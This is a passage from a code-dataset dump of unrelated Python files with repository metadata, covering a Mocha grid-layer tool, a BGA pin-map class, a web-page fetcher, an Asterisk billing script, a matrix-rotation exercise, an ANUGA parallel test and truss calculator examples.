for j in range(0, Mul2):
Mul_AO=j+(PAO.valence_min[l]-(l+1) if len(PAO.valence_min)>l else 0)
reproduced[l][i]+=AO.AOs[l][Mul_AO]*ccoes[l][i][j]
| 2.609375
| 3
|
src/models/items/item.py
|
prajesh-ananthan/web-store
| 0
|
12783510
|
__author__ = "<NAME>"
class Item(object):
def __init__(self, name, price, url):
self.name = name
self.price = price
self.url = url
def __repr__(self):
return "<Item {} with url: {}".format(self.name, self.url)
| 3.359375
| 3
|
create_grid_layers.py
|
boris-fx/mocha-scripts
| 6
|
12783511
|
# BSD 3-Clause License
#
# Copyright (c) 2020, <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from mocha.project import *
import sys
import ast
from collections import OrderedDict
import shiboken2
from PySide2.QtCore import QCoreApplication
from PySide2.QtWidgets import *
app = QApplication.instance()
widgets = app.allWidgets()
class GridLayers(QDialog):
def __init__(self, parent=None):
QDialog.__init__(self, parent)
self._widgets = dict()
self.create_widgets()
self.create_layout()
self.create_connections()
def create_widgets(self):
self._widgets['num_x'] = QLineEdit(self)
self._widgets['num_y'] = QLineEdit(self)
self._widgets['ok'] = QPushButton("OK", self)
self._widgets['cancel'] = QPushButton("Cancel", self)
def create_layout(self):
main_layout = QGridLayout(self)
        form_layout = QFormLayout()  # no parent: it is attached to main_layout below
form_layout.addRow("Number in X:", self._widgets['num_x'])
form_layout.addRow("Number in Y:", self._widgets['num_y'])
main_layout.addLayout(form_layout, 0, 0, 3, 3)
main_layout.addWidget(self._widgets['ok'], 3, 1)
main_layout.addWidget(self._widgets['cancel'], 3, 2)
self.setLayout(main_layout)
def create_connections(self):
self._widgets['ok'].clicked.connect(self.create_grid)
self._widgets['cancel'].clicked.connect(self.reject)
def create_layer(self, proj, clip, width, height, x, y):
x_points = (
XControlPointData(corner=True, active=True, x=float(width * x), y=float(height * y), edge_width=0.0,
edge_angle_ratio=0.5,
weight=0.0),
XControlPointData(corner=True, active=True, x=float(width * x), y=float((height * y) + height),
edge_width=0.0, edge_angle_ratio=0.5,
weight=0.0),
XControlPointData(corner=True, active=True, x=float((width * x) + width), y=float((height * y) + height),
edge_width=0.0, edge_angle_ratio=0.5,
weight=0.0),
XControlPointData(corner=True, active=True, x=float((width * x) + width), y=float(height * y),
edge_width=0.0, edge_angle_ratio=0.5,
weight=0.0),
)
x_layer = proj.add_layer(clip, name=("cell" + str(x) + str(y)), view=0, frame_number=0)
x_layer.add_xspline_contour(0, x_points)
x_layer.parameter(["Track", "TrackingModel"]).set(3, time=0, view=View(0)) # turn shear off
        print(x_layer.parameter(["Track", "TrackingModel"]).keyframes)  # debug: inspect keyframes
def create_grid(self):
proj = get_current_project()
        if not proj:
            self.reject()
            return
num_x = int(self._widgets['num_x'].text())
num_y = int(self._widgets['num_y'].text())
first_clip = proj.default_trackable_clip
clip_size = proj.clips[first_clip.name].frame_size
cell_width = int(clip_size[0] / num_x)
cell_height = int(clip_size[1] / num_y)
# build layers from bottom of frame to top
for y in range(num_y - 1, -1, -1):
for x in range(0, num_x):
self.create_layer(proj, first_clip, cell_width, cell_height, x, y)
self.accept()
if __name__ == "__main__":
grid = GridLayers()
grid.show()
| 1.226563
| 1
|
part_map/object.py
|
jdpatt/bga_color_map
| 2
|
12783512
|
"""Class representing the object being modeled."""
import json
import logging
import re
from pathlib import Path
from typing import Dict, List, Tuple, Union
from natsort import natsorted
from openpyxl import load_workbook
class PartObject:
""" Load and create a part from a source """
def __init__(self, pins, filename):
super().__init__()
self.log = logging.getLogger("partmap.object")
self._pins = pins
self._columns, self._rows = self.sort_and_split_pin_list()
self.filename = Path(filename)
@classmethod
def from_excel(cls, filename):
""" Import an Excel and create a PartObject """
number = "Number"
name = "Name"
workbook = load_workbook(filename)
sheet = workbook.active # Grab the first sheet
try:
column = get_col_index([number, name], sheet)
bga = dict()
for excel_row in range(2, sheet.max_row + 1):
pin = sheet.cell(row=excel_row, column=column[number]).value
net = sheet.cell(row=excel_row, column=column[name])
if pin is not None or net.value is not None:
if net.fill.patternType == "solid":
bga.update(
{
pin: {
"name": net.value,
"color": str("#" + net.fill.start_color.rgb[2:]),
}
}
)
else:
bga.update({pin: {"name": net.value, "color": "#ffffff"}})
except (TypeError, ValueError, KeyError, UnboundLocalError) as error:
print(error)
raise
return cls(bga, filename)
@classmethod
def from_telesis(cls, filename, refdes):
""" Import a Telesis formatted file and create a PartObject """
with open(filename, "r") as tel_file:
tel_text = tel_file.readlines()
tel_netlist = dict()
for line in tel_text:
reg = re.match(r"(.*);", line)
reg2 = re.findall(refdes + r"\.([a-zA-Z0-9]+)", line)
if reg and reg2:
net = reg.group(1)
for reg_match in reg2:
pin = reg_match
tel_netlist.update({pin: {"name": net, "color": "#ffffff"}})
return cls(tel_netlist, filename)
@classmethod
def from_json(cls, filename):
""" Import a json file with a format {pin: {name:, color:}} """
return cls(json.load(open(filename)), filename)
def add_pin(self, pin: str, net: str, color: str) -> None:
"""Add a new pin to the part.
Args:
pin: The Pin Number. (A12)
net: The functional name of the net. (USB_P)
color: The color to fill with.
"""
self._pins.update({pin: {"name": net, "color": color}})
@property
def columns(self) -> List:
""" Get the columns in a part. [1-n] """
return self._columns
@columns.setter
def columns(self, new_columns):
"""Update the columns."""
self._columns = new_columns
@property
def rows(self) -> List:
""" Get the rows in a part. [A - AZ] """
return self._rows
@rows.setter
def rows(self, new_rows):
"""Update the rows."""
self._rows = new_rows
def get_pin(self, prefix: str, suffix: str) -> Union[str, None]:
""" Get the name and color of a pin """
pin = None
if prefix + suffix in self._pins:
pin = self._pins[prefix + suffix]
elif suffix + prefix in self._pins:
pin = self._pins[suffix + prefix]
return pin
@property
def pins(self):
""" Return the pin names """
return self._pins.keys()
def get_number_of_pins(self):
""" Return how many pins are in the part """
return len(self._pins)
def get_net_names(self):
""" Return the net names """
        return [pin["name"] for pin in self._pins.values()]
def dump_json(self):
""" Dump the PartObject dictionary to a .json file """
save_file = self.filename.with_suffix(".json")
self.log.info(f"Saved as json to {save_file}")
with open(save_file, "w") as outfile:
json.dump(self._pins, outfile, sort_keys=True, indent=4, separators=(",", ": "))
def sort_and_split_pin_list(self) -> Tuple[List, List]:
""" Take a list of pins and spilt by letter and number then sort """
r_list: List = list()
c_list = list()
for pin in self.pins:
split_pin = re.split(r"(\d+)", pin)
if split_pin[0] not in r_list:
r_list.append(split_pin[0])
c_list.append(split_pin[1])
temp = list()
temp2 = list()
for item in r_list:
if len(item) > 1:
temp.append(item)
else:
temp2.append(item)
temp2 = natsorted(temp2)
temp2.extend(natsorted(temp))
return natsorted(set(c_list)), temp2
def get_col_index(name: List, worksheet) -> Dict:
""" return a list of the column numbers if it matches """
indexes = dict()
for rows in worksheet.iter_rows(min_row=1, max_row=1, min_col=1):
for column in rows:
if column.value in name:
indexes.update({column.value: column.col_idx})
return indexes
| 2.859375
| 3
|
WebTree.py
|
Tinka8ell/Prayers-and-Readings
| 0
|
12783513
|
<reponame>Tinka8ell/Prayers-and-Readings
# parse html
# Read a requested web page into a "tree" and parse it.
#
# Requires a url and will take an optional dictionary of values
# to be sent as parameters on the HTTP GET.
from datetime import date
import os
from pathlib import Path
import re
import urllib.parse
import urllib.request # as Request
from bs4 import BeautifulSoup # used to parse values into the url
from dateutil.parser import parse
class WebTree:
"""
Read a requested web page into a "tree" and parse it.
Requires a url and will take an optional dictionary of values
to be sent as parameters on the HTTP GET.
"""
def __init__(self, url, values=None):
# unknown if this is used or not or even why it is here ...
self.directory = "/var/www/html"
self.prefix = "http://piweb/"
# known code ...
self.url = url
self.values = values
self.data = None
if values:
data = urllib.parse.urlencode(values)
self.data = data.encode('utf-8') # data should be bytes
self.root = None
self.root = self.read() # root of the tree
self.parse() # use the overrideable parse() method to process it.
return
def read(self):
url = self.url
data = self.data # could be None if no headers passed
# create a bunch of headers so we don't look too robot like
headers = {}
        headers['User-Agent'] = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
                                 "AppleWebKit/537.36 (KHTML, like Gecko) "
                                 "Chrome/79.0.3945.88 "
                                 "Safari/537.36")
req = urllib.request.Request(url, headers=headers, data=data)
with urllib.request.urlopen(req) as f:
g = f.read().decode('utf-8')
# generate element tree
root = BeautifulSoup(g, 'html.parser')
return root
def parse(self):
"""
Default is to do nothing, but should be overridden by subclasses.
"""
return
def show(self):
"""
Basic display function for debugging.
"""
print("url:", self.url)
print("values:", self.values)
return
if __name__ == "__main__":
# simple test of a known source page
tree = WebTree("https://www.moravian.org/the-daily-texts/")
tree.show()
| 3.375
| 3
|
agi_ast/turbobil.py
|
roramirez/turbobil
| 5
|
12783514
|
#!/usr/bin/env python
'Turbobil agi Asterisk'
__author__ = "<NAME>"
__version__ = "0.1.2"
__email__ = "<EMAIL>"
import os
import sys
from turbodb import *
import logging
from agi import *
from dialer import *
#Type pay
PRE_PAY = 1
POST_PAY = 2
# INFO, DEBUG, WARNING, CRITICAL, ERROR
def set_logging(cfg_level=logging.INFO):
logging.basicConfig(level=cfg_level)
logFormatter = logging.Formatter("%(asctime)s [%(threadName)s] [%(levelname)s] %(message)s")
rootLogger = logging.getLogger()
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
rootLogger.addHandler(consoleHandler)
logger = logging.getLogger(__name__)
def check_credit(customer):
""" Check customer credit """
if customer.type_pay == PRE_PAY:
if customer.credit <= 0:
logging.info('customer id %s dont have credit' % customer.id)
sys.exit()
elif customer.type_pay == POST_PAY:
logging.info('customer id %s POST_PAY' % customer.id)
else:
logging.error('customer id %s dont have valid method pay' % customer.id)
sys.exit()
if __name__ == '__main__':
set_logging()
accountcode = sys.argv[1].strip()
destination = sys.argv[2].strip()
timeout = 45
database = TurboDb()
customer = database.get_customer_by_accountcode(accountcode)
if not customer:
logging.error('customer not found')
sys.exit()
check_credit(customer)
#TODO
#Not yet implement
#if customer.customer_id:
#check reseller credit
# reseller = database.get_customer_by_id(customer.customer_id)
# check_credit(reseller)
#check route
routes = database.get_routes_to_customer(customer, destination)
if not routes:
logging.error('routes not found')
sys.exit()
#dialer call
agi = AGI()
dialer = dialer(agi)
for r in routes:
price = database.get_price_customer_route(r)
agi.verbose(price)
if customer.type_pay == PRE_PAY:
limit = int(customer.credit /(price / 60) * 1000)
else:
limit = 10000000
str_provider = 'SIP/%s@%s_provider,%s' % (destination, r.Provider.id, timeout)
op_dial = '|L(%s:0:0),90' % (limit)
str_dial = str_provider + op_dial
d_status = dialer.dial(str_dial)
database.save_call(destination, customer, r, d_status, price)
if d_status['dialstatus'] in ['NOANSWER', 'CANCEL'] :
break
elif d_status['dialstatus'] in ['ANSWER']:
break
elif d_status['dialstatus'] in ['CHANUNAVAIL', 'CONGESTION', 'BUSY']:
continue
sys.exit()
| 2.3125
| 2
|
Python/Cracking the Coding Interview/Chapter 1_Arrays and Strings/1.6.py
|
honghaoz/Interview-Algorithm-in-Swift
| 1
|
12783515
|
# Given an image represented by NxN matrix,
# where each pixel in the image is 4 bytes,
# write a method to rotate the image by 90 degrees,
# In place?
# In place
from math import ceil
def rotate(m):
degree = len(m)
# Precondition
for eachLine in m:
if not degree == len(eachLine):
return False
# layer by layer
for i in xrange(int(ceil(degree / 2.0))):
for y in xrange(degree - i * 2 - 1):
j = y + i
# i stands for layer
# j stands for index
m[i][j], m[j][degree - 1 - i] = m[j][degree - 1 - i], m[i][j]
m[i][j], m[degree - 1 - i][degree - 1 - j] = m[degree - 1 - i][degree - 1 - j], m[i][j]
m[i][j], m[degree - 1 - j][i] = m[degree - 1 - j][i], m[i][j]
return m
# Helper
def printMatrix(m):
degree = len(m)
# Precondition
for eachLine in m:
if not degree == len(eachLine):
return False
for row in xrange(degree):
print m[row]
def test():
matrix1 = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12],
[13, 14, 15, 16]]
matrix1Rotated = [[13, 9, 5, 1],
[14, 10, 6, 2],
[15, 11, 7, 3],
[16, 12, 8, 4]]
matrix2 = [[1, 2, 3, 4, 5],
[6, 7, 8, 9, 10],
[11, 12, 13, 14, 15],
[16, 17, 18, 19, 20],
[21, 22, 23, 24, 25]]
matrix2Rotated = [[21, 16, 11, 6, 1],
[22, 17, 12, 7, 2],
[23, 18, 13, 8, 3],
[24, 19, 14, 9, 4],
[25, 20, 15, 10, 5]]
print "Passed" if rotate(matrix1) == matrix1Rotated else "Failed"
print "Passed" if rotate(matrix2) == matrix2Rotated else "Failed"
test()
| 3.5
| 4
|
anuga/parallel/tests/test_sequential_dist_sw_flow.py
|
samcom12/anuga_core
| 136
|
12783516
|
<reponame>samcom12/anuga_core
"""
Simple water flow example using ANUGA
Water driven up a linear slope and time varying boundary,
similar to a beach environment
This is a very simple test of the parallel algorithm using the simplified parallel API
"""
from __future__ import print_function
from __future__ import division
#------------------------------------------------------------------------------
# Import necessary modules
#------------------------------------------------------------------------------
from past.utils import old_div
from future.utils import raise_
import unittest
import os
import sys
#import pypar
import numpy as num
import anuga
from anuga import Domain
from anuga import Reflective_boundary
from anuga import Dirichlet_boundary
from anuga import Time_boundary
from anuga import Transmissive_boundary
from anuga import rectangular_cross_domain
from anuga import distribute, myid, numprocs, send, receive, barrier, finalize
from anuga.parallel.sequential_distribute import sequential_distribute_dump
from anuga.parallel.sequential_distribute import sequential_distribute_load
import anuga.utilities.plot_utils as util
#--------------------------------------------------------------------------
# Setup parameters
#--------------------------------------------------------------------------
yieldstep = 0.25
finaltime = 1.0
nprocs = 4
N = 29
M = 29
verbose = False
new_parameters = {}
new_parameters['ghost_layer_width'] = 2
#---------------------------------
# Setup Functions
#---------------------------------
def topography(x,y):
return old_div(-x,2)
###########################################################################
# Setup Test
##########################################################################
def run_simulation(parallel=False, verbose=False):
#--------------------------------------------------------------------------
# Setup computational domain and quantities
#--------------------------------------------------------------------------
if myid == 0:
domain = rectangular_cross_domain(M, N)
domain.set_name('odomain') # Set sww filename
domain.set_datadir('.')
domain.set_quantity('elevation', topography) # Use function for elevation
domain.set_quantity('friction', 0.0) # Constant friction
domain.set_quantity('stage', expression='elevation') # Dry initial stage
else:
domain = None
#--------------------------------------------------------------------------
# Create pickled partition
#--------------------------------------------------------------------------
if myid == 0:
if verbose: print('DUMPING PARTITION DATA')
sequential_distribute_dump(domain, numprocs, verbose=verbose, parameters=new_parameters)
#--------------------------------------------------------------------------
# Create the parallel domains
#--------------------------------------------------------------------------
if parallel:
if myid == 0 and verbose : print('DISTRIBUTING TO PARALLEL DOMAIN')
pdomain = distribute(domain, verbose=verbose, parameters=new_parameters)
pdomain.set_name('pdomain')
if myid == 0 and verbose : print('LOADING IN PARALLEL DOMAIN')
sdomain = sequential_distribute_load(filename='odomain', verbose = verbose)
sdomain.set_name('sdomain')
if myid == 0 and verbose: print('EVOLVING pdomain')
setup_and_evolve(pdomain, verbose=verbose)
if myid == 0 and verbose: print('EVOLVING sdomain')
setup_and_evolve(sdomain, verbose=verbose)
if myid == 0:
if verbose: print('EVOLVING odomain')
setup_and_evolve(domain, verbose=verbose)
if myid == 0 and verbose:
parameter_file=open('odomain.txt', 'w')
from pprint import pprint
pprint(domain.get_algorithm_parameters(),parameter_file,indent=4)
parameter_file.close()
parameter_file=open('sdomain.txt', 'w')
from pprint import pprint
pprint(sdomain.get_algorithm_parameters(),parameter_file,indent=4)
parameter_file.close()
parameter_file=open('pdomain.txt', 'w')
from pprint import pprint
pprint(pdomain.get_algorithm_parameters(),parameter_file,indent=4)
parameter_file.close()
assert num.allclose(pdomain.quantities['stage'].centroid_values, sdomain.quantities['stage'].centroid_values)
assert num.allclose(pdomain.quantities['stage'].vertex_values, sdomain.quantities['stage'].vertex_values)
assert num.allclose(pdomain.vertex_coordinates, sdomain.vertex_coordinates)
assert num.allclose(pdomain.centroid_coordinates, sdomain.centroid_coordinates)
#---------------------------------
# Now compare the merged sww files
#---------------------------------
if myid == 0:
if verbose: print('COMPARING SWW FILES')
odomain_v = util.get_output('odomain.sww')
odomain_c = util.get_centroids(odomain_v)
pdomain_v = util.get_output('pdomain.sww')
pdomain_c = util.get_centroids(pdomain_v)
sdomain_v = util.get_output('sdomain.sww')
sdomain_c = util.get_centroids(sdomain_v)
# Test some values against the original ordering
if verbose:
order = 2
print('PDOMAIN CENTROID VALUES')
print(num.linalg.norm(odomain_c.x-pdomain_c.x,ord=order))
print(num.linalg.norm(odomain_c.y-pdomain_c.y,ord=order))
print(num.linalg.norm(odomain_c.stage[-1]-pdomain_c.stage[-1],ord=order))
print(num.linalg.norm(odomain_c.xmom[-1]-pdomain_c.xmom[-1],ord=order))
print(num.linalg.norm(odomain_c.ymom[-1]-pdomain_c.ymom[-1],ord=order))
print(num.linalg.norm(odomain_c.xvel[-1]-pdomain_c.xvel[-1],ord=order))
print(num.linalg.norm(odomain_c.yvel[-1]-pdomain_c.yvel[-1],ord=order))
print('SDOMAIN CENTROID VALUES')
print(num.linalg.norm(odomain_c.x-sdomain_c.x,ord=order))
print(num.linalg.norm(odomain_c.y-sdomain_c.y,ord=order))
print(num.linalg.norm(odomain_c.stage[-1]-sdomain_c.stage[-1],ord=order))
print(num.linalg.norm(odomain_c.xmom[-1]-sdomain_c.xmom[-1],ord=order))
print(num.linalg.norm(odomain_c.ymom[-1]-sdomain_c.ymom[-1],ord=order))
print(num.linalg.norm(odomain_c.xvel[-1]-sdomain_c.xvel[-1],ord=order))
print(num.linalg.norm(odomain_c.yvel[-1]-sdomain_c.yvel[-1],ord=order))
print('PDOMAIN VERTEX VALUES')
print(num.linalg.norm(odomain_v.stage[-1]-pdomain_v.stage[-1],ord=order))
print(num.linalg.norm(odomain_v.xmom[-1]-pdomain_v.xmom[-1],ord=order))
print(num.linalg.norm(odomain_v.ymom[-1]-pdomain_v.ymom[-1],ord=order))
print(num.linalg.norm(odomain_v.xvel[-1]-pdomain_v.xvel[-1],ord=order))
print(num.linalg.norm(odomain_v.yvel[-1]-pdomain_v.yvel[-1],ord=order))
print('SDOMAIN VERTEX VALUES')
print(num.linalg.norm(odomain_v.stage[-1]-sdomain_v.stage[-1],ord=order))
print(num.linalg.norm(odomain_v.xmom[-1]-sdomain_v.xmom[-1],ord=order))
print(num.linalg.norm(odomain_v.ymom[-1]-sdomain_v.ymom[-1],ord=order))
print(num.linalg.norm(odomain_v.xvel[-1]-sdomain_v.xvel[-1],ord=order))
print(num.linalg.norm(odomain_v.yvel[-1]-sdomain_v.yvel[-1],ord=order))
assert num.allclose(odomain_c.stage,pdomain_c.stage)
assert num.allclose(odomain_c.xmom,pdomain_c.xmom)
assert num.allclose(odomain_c.ymom,pdomain_c.ymom)
assert num.allclose(odomain_c.xvel,pdomain_c.xvel)
assert num.allclose(odomain_c.yvel,pdomain_c.yvel)
assert num.allclose(odomain_v.x,pdomain_v.x)
assert num.allclose(odomain_v.y,pdomain_v.y)
assert num.linalg.norm(odomain_v.x-pdomain_v.x,ord=0) == 0
assert num.linalg.norm(odomain_v.y-pdomain_v.y,ord=0) == 0
assert num.linalg.norm(odomain_v.stage[-1]-pdomain_v.stage[-1],ord=0) < 100
assert num.linalg.norm(odomain_v.xmom[-1]-pdomain_v.xmom[-1],ord=0) < 100
assert num.linalg.norm(odomain_v.ymom[-1]-pdomain_v.ymom[-1],ord=0) < 100
assert num.linalg.norm(odomain_v.xvel[-1]-pdomain_v.xvel[-1],ord=0) < 100
assert num.linalg.norm(odomain_v.yvel[-1]-pdomain_v.yvel[-1],ord=0) < 100
assert num.allclose(odomain_c.x,sdomain_c.x)
assert num.allclose(odomain_c.y,sdomain_c.y)
assert num.allclose(odomain_c.stage,sdomain_c.stage)
assert num.allclose(odomain_c.xmom,sdomain_c.xmom)
assert num.allclose(odomain_c.ymom,sdomain_c.ymom)
assert num.allclose(odomain_c.xvel,sdomain_c.xvel)
assert num.allclose(odomain_c.yvel,sdomain_c.yvel)
assert num.allclose(odomain_v.x,sdomain_v.x)
assert num.allclose(odomain_v.y,sdomain_v.y)
order = 0
assert num.linalg.norm(odomain_v.x-sdomain_v.x,ord=order) == 0
assert num.linalg.norm(odomain_v.y-sdomain_v.y,ord=order) == 0
assert num.linalg.norm(odomain_v.stage[-1]-sdomain_v.stage[-1],ord=order) < 100
assert num.linalg.norm(odomain_v.xmom[-1]-sdomain_v.xmom[-1],ord=order) < 100
assert num.linalg.norm(odomain_v.ymom[-1]-sdomain_v.ymom[-1],ord=order) < 100
assert num.linalg.norm(odomain_v.xvel[-1]-sdomain_v.xvel[-1],ord=order) < 100
assert num.linalg.norm(odomain_v.yvel[-1]-sdomain_v.yvel[-1],ord=order) < 100
# COMPARE CENTROID PDOMAIN SDOMAIN
assert num.allclose(pdomain_c.x,sdomain_c.x)
assert num.allclose(pdomain_c.y,sdomain_c.y)
assert num.allclose(pdomain_c.stage[-1],sdomain_c.stage[-1])
assert num.allclose(pdomain_c.xmom[-1],sdomain_c.xmom[-1])
assert num.allclose(pdomain_c.ymom[-1],sdomain_c.ymom[-1])
assert num.allclose(pdomain_c.xvel[-1],sdomain_c.xvel[-1])
assert num.allclose(pdomain_c.yvel[-1],sdomain_c.yvel[-1])
# COMPARE VERTEX PDOMAIN SDOMAIN
assert num.allclose(pdomain_v.x,sdomain_v.x)
assert num.allclose(pdomain_v.y,sdomain_v.y)
assert num.allclose(pdomain_v.stage[-1],sdomain_v.stage[-1])
assert num.allclose(pdomain_v.xmom[-1],sdomain_v.xmom[-1])
assert num.allclose(pdomain_v.ymom[-1],sdomain_v.ymom[-1])
assert num.allclose(pdomain_v.xvel[-1],sdomain_v.xvel[-1])
assert num.allclose(pdomain_v.yvel[-1],sdomain_v.yvel[-1])
import os
os.remove('odomain.sww')
os.remove('pdomain.sww')
os.remove('sdomain.sww')
os.remove('odomain_P3_0.pickle')
os.remove('odomain_P3_1.pickle')
os.remove('odomain_P3_2.pickle')
#os.remove('odomain_P4_3.pickle')
import glob
[ os.remove(fl) for fl in glob.glob('*.npy') ]
def setup_and_evolve(domain, verbose=False):
#--------------------------------------------------------------------------
# Setup domain parameters
#--------------------------------------------------------------------------
domain.set_flow_algorithm('DE0')
#domain.set_store_vertices_uniquely()
#------------------------------------------------------------------------------
# Setup boundary conditions
# This must currently happen *AFTER* domain has been distributed
#------------------------------------------------------------------------------
Br = Reflective_boundary(domain) # Solid reflective wall
Bd = Dirichlet_boundary([-0.2,0.,0.]) # Constant boundary values
# Associate boundary tags with boundary objects
domain.set_boundary({'left': Br, 'right': Bd, 'top': Br, 'bottom': Br})
#------------------------------------------------------------------------------
# Evolve
#------------------------------------------------------------------------------
for t in domain.evolve(yieldstep = yieldstep, finaltime = finaltime):
if myid == 0 and verbose : domain.write_time()
#if myid == 0 and verbose : print domain.quantities['stage'].get_maximum_value()
domain.sww_merge(delete_old=True)
# Test an nprocs-way run of the shallow water equations
# against the sequential code.
class Test_parallel_sw_flow(unittest.TestCase):
def test_parallel_sw_flow(self):
if verbose : print("Expect this test to fail if not run from the parallel directory.")
cmd = anuga.mpicmd(os.path.abspath(__file__))
result = os.system(cmd)
assert_(result == 0)
# Because we are doing assertions outside of the TestCase class
# the PyUnit defined assert_ function can't be used.
def assert_(condition, msg="Assertion Failed"):
if condition == False:
#pypar.finalize()
raise_(AssertionError, msg)
if __name__=="__main__":
if numprocs == 1:
runner = unittest.TextTestRunner()
suite = unittest.makeSuite(Test_parallel_sw_flow, 'test')
runner.run(suite)
else:
from anuga.utilities.parallel_abstraction import global_except_hook
import sys
sys.excepthook = global_except_hook
#------------------------------------------
# Run the codel and compare sequential
# results at 4 gauge stations
#------------------------------------------
if myid ==0 and verbose: print('PARALLEL START')
run_simulation(parallel=True, verbose=verbose)
finalize()
| 2.65625
| 3
|
Examples/example.py
|
lorcan2440/SimpleTrussCalculator
| 1
|
12783517
|
<filename>Examples/example.py
import _import_helper # noqa
from Source import Truss_Calculator as tc
'''
It is recommended to use the factory functions to build trusses (Example 1).
However, it is also possible to directly create the objects using classes (Example 2).
'''
#########################################################
# Example 1: Building a truss using factory functions #
#########################################################
# set some initial parameters
default_bar_params = {"b": 16, "t": 1.1, "D": 5, "E": 210, "strength_max": 0.216}
units_system = 'kN, mm'
# initialise a truss (and set it as the active truss)
tc.init_truss('My First Truss', default_bar_params, units_system)
# create the joints: name, x, y
tc.create_joint('A', 0, 0)
tc.create_joint('B', 0, 100)
tc.create_joint('C', 100, 0)
tc.create_joint('D', 100, 100)
tc.create_joint('E', 200, 0)
tc.create_joint('F', 200, 100)
# create the bars: name, *between_which_joints_names
tc.create_bar('AB', 'A', 'B')
tc.create_bar('AC', 'A', 'C')
tc.create_bar('AD', 'A', 'D')
tc.create_bar('BD', 'B', 'D')
tc.create_bar('CD', 'C', 'D')
tc.create_bar('CE', 'C', 'E')
tc.create_bar('DE', 'D', 'E')
tc.create_bar('DF', 'D', 'F')
tc.create_bar('EF', 'E', 'F')
# apply loads: name, joint, x, y
tc.create_load('W', 'D', 0, -100)
# put supports at joints: name, joint, type
tc.create_support('A', 'A', 'pin')
tc.create_support('E', 'E', 'roller', roller_normal=(0, 1))
# make calculations and get results of analysis
my_results = tc.active_truss.Result(tc.active_truss, sig_figs=3, solution_method=tc.SolveMethod.SCIPY)
# show the results in text form
print(my_results)
# get e.g. force and stress in a specific bar
print(tc.active_truss.results['internal_forces']['AD']) # unrounded
print(tc.active_truss.results['stresses']['AD'])
print(my_results.tensions['AD']) # rounded
print(my_results.stresses['AD'])
# show the results in graphical form. If we may want to use this truss again (e.g. in Example 3)
# then we must set _delete_truss_after = False.
tc.plot_diagram(tc.active_truss, my_results, show_reactions=True, _delete_truss_after=False)
###############################################
# Example 2: Building a truss using objects #
###############################################
# initialise a truss (and set it as the active truss).
# NOTE: if the var_name argument is omitted, there can be issues with saving/loading.
my_truss = tc.Truss('My Second Truss', default_bar_params, units_system, var_name='my_truss')
# create the joints: truss object, name, x, y
joint_a = my_truss.Joint(my_truss, 'A', 0, 0)
joint_b = my_truss.Joint(my_truss, 'B', 0, 100)
joint_c = my_truss.Joint(my_truss, 'C', 100, 0)
joint_d = my_truss.Joint(my_truss, 'D', 100, 100)
joint_e = my_truss.Joint(my_truss, 'E', 200, 0)
joint_f = my_truss.Joint(my_truss, 'F', 200, 100)
# create the bars: truss, name, *between_which_joints_objects
bar_ab = my_truss.Bar(my_truss, 'AB', joint_a, joint_b)
bar_ac = my_truss.Bar(my_truss, 'AC', joint_a, joint_c)
bar_ad = my_truss.Bar(my_truss, 'AD', joint_a, joint_d)
bar_bd = my_truss.Bar(my_truss, 'BD', joint_b, joint_d)
bar_cd = my_truss.Bar(my_truss, 'CD', joint_c, joint_d)
bar_ce = my_truss.Bar(my_truss, 'CE', joint_c, joint_e)
bar_de = my_truss.Bar(my_truss, 'DE', joint_d, joint_e)
bar_df = my_truss.Bar(my_truss, 'DF', joint_d, joint_f)
bar_ef = my_truss.Bar(my_truss, 'EF', joint_e, joint_f)
# apply loads: name, joint object, x, y
load_w = my_truss.Load('W', joint_d, 0, -100)
# put supports at joints: name, joint, type
support_a = my_truss.Support('A', joint_a, 'pin')
support_e = my_truss.Support('E', joint_e, 'roller', (0, 1))
# make calculations and get results of analysis
my_results = my_truss.Result(my_truss, sig_figs=3, solution_method=tc.SolveMethod.SCIPY)
# show the results in text form
print(my_results)
# show the results in graphical form. If we may want to use this truss again (e.g. in Example 3)
# then we must set _delete_truss_after = False.
tc.plot_diagram(my_truss, my_results, show_reactions=True, _delete_truss_after=False)
###################################
# Example 3: Saving and loading #
###################################
# NOTE: saving and loading does not work on trusses created using objects,
# unless a var_name is specified when initialising the truss.
tc.active_truss.dump_truss_to_json('./Saved Trusses')
my_truss.dump_truss_to_json('./Saved Trusses')
tc.load_truss_from_json('./Saved Trusses/my_first_truss.json') # load truss from Example 1
tc.load_truss_from_json('./Saved Trusses/my_truss.json') # load truss from Example 2
| 3.296875
| 3
|
function1.py
|
shreya-n-kumari/python
| 0
|
12783518
|
<filename>function1.py
#Defining and Calling the Function in Python Script.
def list_product(my_list):
result = 1
for number in my_list:
result = result * number
return result
print(list_product([2, 3]))
print(list_product([2, 10, 15]))
def add_suffix(suffix = '.com'):
return 'google' + suffix
print(add_suffix()) #without specifying argument(default argument).
print(add_suffix('.nic.in')) #with argument.
| 3.734375
| 4
|
Cookie_Cutter.py
|
devcoinfet/Cookie_Inject0r
| 0
|
12783519
|
